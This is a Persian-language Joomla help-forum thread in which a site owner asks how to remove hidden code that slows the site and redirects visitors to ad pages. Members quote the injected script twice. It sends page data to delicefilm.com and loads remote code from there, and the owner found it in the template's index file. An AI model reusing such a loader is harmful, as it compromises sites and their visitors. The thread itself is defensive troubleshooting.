-
وجود کد سایتهای دیگر در صفحات جوملا
با سلام
چند روزی است که سایت جوملایی بنده خیلی کند شده و گاهی هنگام لود برخی صفحات سایت مرورگر به صفحات دیگر ارجاع داده میشه که تبلیغاتی هستند و به همین دلیل سرعت سایت خیلی کند شده .
میخواستم بدونم چطور میشه این کدهای پنهان را از صفحات سایت پاک کرد ضمنا ادرس یکی از این سایتها را به وسیله debugger در فایر فاکس پیدا کردم.ضمنا جدیدا هیچ افزونه ایی نصب نکرده ام.
ممنون از لطف شما
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
-
01-11-2016 12:08 PM
# ADS
تبلیغات در جوملا فارسی
-
-
-
کجای سایت مشکل داره من که ایراد خاصی ندیدم
مشکل سرعت هم به دلیل استفاده کم از منابع سیستم است.(خودمونیش میشه هاستت ارزونه و ضعیفه)
-
کاربر مقابل از mediawiki عزیز به خاطر این پست مفید تشکر کرده است:
-
مرورگر ادرس دیگری را فراخوانی میکنه در قسمت پایین سمت چپ مینویسه wating for delicefilm.com که این ادرس اصلا توی کدهای سایت من نیست
-
-
بله، لینک زیر رو کپی کنید و در مروگر خودتان وارد کنید (به جای site.com آدرس خودتون را وارد کنید.)
شما اگر کلید Ctrl و F فشار دهید و عبارت delicefilm را در فرم جستجو وارد کنید، به کدهای زیر فرستاده می شوید:
کد:
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
همانطور که برای شما پر رنگ کردم می بینید یک فایل از سایت مربوطه در یک اسکریپت برای وبسایت شما فراخوانی می شود، از آنجایی که jquery هم هست، شاید یک فایل با حجم زیاد باشد، از آنجایی که این فایل سمت سرور هست نمی تونم اطلاعات مناسبی به شما بدم
در نهایت باید ببینید در کدام بخش سایت شما این اسکریپت استفاده شده است. همچنین اسکریپت های آمارگیری در پایین سایت شما باعث کندی می توانند باشند، همچنین Gzip را از تنظیمات کلی سایت فعال کنید تا سرعت بیشتر شود.
تشکرت یادت نره!
ویرایش توسط mediawiki : 01-11-2016 در ساعت 01:46 PM
-
2 کاربر زیر از mediawiki عزیز به خاطر این پست مفید تشکر کرده اند.
-
با سلام
راهی وجود داره تا این کد را حذف کنم؟
-
-
بله
افزونه ها یا قالب شما عامل اصلی این مشکل هست.
-
-
چطور میشه فهمید از کدوم یکی هست؟
-
-
من کدش را در فایل index قالب پیدا کردم
-
-
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>
<?php
اگر این سطرها را پاک کنم درست میشه؟
ممنون
-
علاقه مندی ها (Bookmarks)